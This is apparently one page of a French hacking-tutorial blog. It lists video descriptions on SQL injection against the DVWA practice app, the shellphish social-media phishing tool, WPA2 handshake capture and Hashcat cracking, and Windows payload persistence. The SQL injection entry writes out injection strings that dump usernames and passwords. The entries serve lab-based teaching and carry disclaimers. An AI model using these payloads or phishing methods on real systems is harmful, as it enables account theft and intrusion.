Page 3 of 12

Injection SQL sur DVWA

Tutoriel en français expliquant le principe de l’injection SQL sur le framework DVWA.

Ce tutoriel a été réalisé sur une application prévue pour des tests d’intrusion.

Je ne vous encourage en aucun cas à reproduire ce type d’attaque sur un système qui ne vous appartient pas.

Le lien de DVWA :

http://www.dvwa.co.uk/

Les commandes utilisées :
1′ or 1=1#
1′ or 1=1 union select table_name from information_schema.tables#
1′ or 1=1 union select null, table_name from information_schema.tables#
1′ or 1=1 union select table_name, column_name from information_schema.columns#
1′ or 1=1 union select user, password from users#

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

La musique de fond :
Titre: Leaf
Auteur: KV
Source: https://soundcloud.com/kvmusicprod
Licence: https://www.creativecommons.org/licenses/by/4.0/
Téléchargement (5MB): https://www.auboutdufil.com/index.php?id=509

NoLimitSecu : Le meilleur podcast

Logo de NoLimitSecu

Tous les jours j’ai environ 40 minutes de route depuis mon domicile jusqu’à mon travail.

Au début, j’écoutais la radio, puis je me suis mis à écouter des conférences Linux sur Youtube (celle-ci est top : https://www.youtube.com/watch?v=PlsSS16k8Vk) mais je suis vite arrivé au bout de ce que je cherchais…

Et c’est là que j’ai découvert le fabuleux monde des podcasts !

Il en existe beaucoup, mais mon préféré est celui de NoLimitSécu.

Les mecs sont des pros, qui font intervenir des pros, dans une émission déstinée à des pros ! #LaSécuPourLesGrosBarbus

Bref, c’est super intéressant et plaisant à écouter.

Il fallait donc que je vous en parle 🙂

Voici le lien pour vous abonner :

https://www.nolimitsecu.fr

Leur seul défaut c’est de pas en publier plus souvent !


Sinon, j’écoute également ceux là :

Niptech : https://niptech.com

Les Technos : https://lestechnos.be

Si vous en avez d’autres, je suis preneur !

Toc toc ? Y-a-t’il un Apache vulnérable ici ?

Ça commence déjà !

Le site est en ligne depuis hier et on a déjà un petit malin qui fait passer du nmap et de l’uniscan par là 🙂

Capture d’écran du fichier d’accès d’Apache montrant les requêtes Nmap
Capture d’écran du fichier d’accès d’Apache montrant les requêtes Uniscan

En revanche, il a oublié de mettre en marche son VPN on dirait…

Attention mon ami, on te voit !

Le grand déménagement

Si vous lisez ces lignes, c’est que tout s’est bien passé 🙂

Youtube a choisi de modifier ses conditions générales et désormais les tutos risquent de ne plus pouvoir être hébergés sur cette plateforme.

J’ai donc choisi la voie de l’indépendance !

Le site est encore en cours de construction mais c’est pour bientôt !

L’ensemble des tutos seront donc disponibles sur ce serveur, avec un doublon sur la chaine Youtube (jusqu’à sa fermeture).

Encore un peu de patience 😉

Proc

#TeamKali

Piratage de réseaux sociaux à distance (Instagram, Facebook, Twitter)

Tutoriel en français expliquant le fonctionnement du script shellphish.

Ce tutoriel est à but instructif uniquement.
Je ne vous incite en aucun cas à prendre le contrôle d’un système ou d’un réseau qui ne vous appartient pas.

Le repo github de thelinuxchoice :
https://github.com/thelinuxchoice/shellphish

Canon EOS 700D
Objectif Canon 50mm F1.8
Microphone BOYA BY-M1

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

Musique de fond :
Titre: No Love
Auteur: Shearer
Source: https://shearer.bandcamp.com/
Licence: https://creativecommons.org/licenses/by/3.0/deed.fr
Téléchargement (7MB): https://www.auboutdufil.com/index.php?id=508

Mots clés :

Kali Linux ShellPhish Réseaux Sociaux Facebook Twitter Instagram Piratage Social Engeneering Ingénierie Sociale Phishing Distance Serveo Ngrock Hacking

Retour aux sources : Le VPN (PPTP, L2TP & OpenVPN)

Tutoriel en français détaillant le fonctionnement général d’un VPN et expliquant la partie technique des VPN PPTP, L2TP et OpenVPN.

Filmé avec un Canon EOS 700D
Objectif Canon 50mm F1.8
Microphone BOYA BY-M1

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

Musique de fond :
Titre: Unwanted
Auteur: Cudar
Source: http://www.cudar.de/
Licence: http://creativecommons.org/licenses/by-nc-sa/3.0/deed.fr
Téléchargement (11MB): https://www.auboutdufil.com/index.php?id=477

Pirater un réseau wifi WPA2 avec un Raspberry

Tutoriel en français expliquant comment récupérer le handshake de reconnexion d’un client à un réseau wifi avec airodump-ng et aireplay-ng à l’aide d’un Raspberry pi 3B+.

Ce tutoriel est à but instructif uniquement.
Je ne vous incite en aucun cas à prendre le contrôle d’un système ou d’un réseau qui ne vous appartient pas.

Filmé avec un appareil Canon 6D MARK II
Objectif Canon macro 100mm f2.8
Microphone BOYA BY-M1

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

Musique de fond :
Titre: Daily Dozen
Auteur: Astat
Source: https://soundcloud.com/astat
Licence: http://creativecommons.org/licenses/by-nc/3.0/
Téléchargement (6MB): https://www.auboutdufil.com/index.php?id=459

Piratage de réseau wifi avec GPU via Hashcat

Tutoriel en français expliquant comment utiliser la puissance de calcul de sa carte graphique pour déchiffrer le mot de passe d’un réseau wifi à partir d’un fichier de handshake airodump-ng.

Ce tutoriel est à but instructif uniquement.
Je ne vous incite en aucun cas à prendre le contrôle d’un système ou d’un réseau qui ne vous appartient pas.

La vidéo de la semaine dernière :
https://youtu.be/ALh84YrsrXA

Lien téléchargement nvidia :
https://docs.kali.org/general-use/install-nvidia-drivers-on-kali-linux

Le repo github de Hashcat-utils :
https://github.com/hashcat/hashcat-utils

Canon EOS 700D
Objectif Canon 50mm F1.8
Microphone BOYA BY-M1

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

Musique de fond :
Titre: Voices
Auteur: Botany Bay
Source: http://botanybay.cc
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/fr/
Téléchargement (7MB): https://www.auboutdufil.com/index.php?id=268

Installer Kali Linux sur un Raspberry

Tutoriel en français expliquant comment installer Kali linux sur un Raspberry.

Le lien vers la page de téléchargement de Kali linux :
https://www.offensive-security.com/kali-linux-arm-images

Le lien de téléchargement de Etcher :
https://www.balena.io/etcher

Le lien de téléchargement de Advanced IP Scanner :
https://www.advanced-ip-scanner.com/fr

Le lien de téléchargement de Putty :
https://www.putty.org

Musique de fond :
Titre: Back to start
Auteur: Colida
Source: http://colida.bandcamp.com/
Licence: http://creativecommons.org/licenses/by-nc-nd/2.5/
Téléchargement (7MB): https://www.auboutdufil.com/index.php?id=19

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

Filmé avec un appareil photo Canon EOS 700D
Objectif EF LENS 50mm 1:1.8 STM
Microphone Boya BY-M1

Rendre son virus persistant

Tutoriel en français expliquant comment rendre un payload persistant sur un système windows.
Ce tutoriel a été réalisé sur un environnement de test et demeure a but instructif uniquement.
Je ne vous encourage en aucun cas à prendre le contrôle d’un système qui ne vous appartient pas.

La liste des commandes est disponible sur mon cloud privé :
http://thiefin.fr:8080/index.php/s/F9hTgLUgyx0T7QN

La musique de fond :
Titre: My Little Kingdom
Auteur: Golden Duck Orchestra
Source: https://goldenduckorchestra.bandcamp.com
Licence: https://creativecommons.org/licenses/by/3.0/deed.fr
Téléchargement (9MB): https://www.auboutdufil.com/index.php?id=512

« Older posts Newer posts »